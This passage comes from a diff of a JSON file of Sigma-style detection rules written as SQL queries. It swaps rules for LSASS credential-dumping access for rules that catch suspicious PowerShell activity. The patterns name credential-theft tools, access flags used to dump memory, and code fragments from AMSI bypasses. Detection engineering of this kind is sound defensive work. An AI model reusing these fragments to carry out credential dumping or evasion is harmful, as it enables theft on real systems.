+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "status": "test", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND 
CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "AMSI Bypass 
Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
(TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Recon Information for Export with PowerShell", + "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Non identified legit exectubale" + 
"Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", - "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "status": "experimental", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess 
LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.exfiltration" 
], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE 
'%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", - "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE 
'%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE 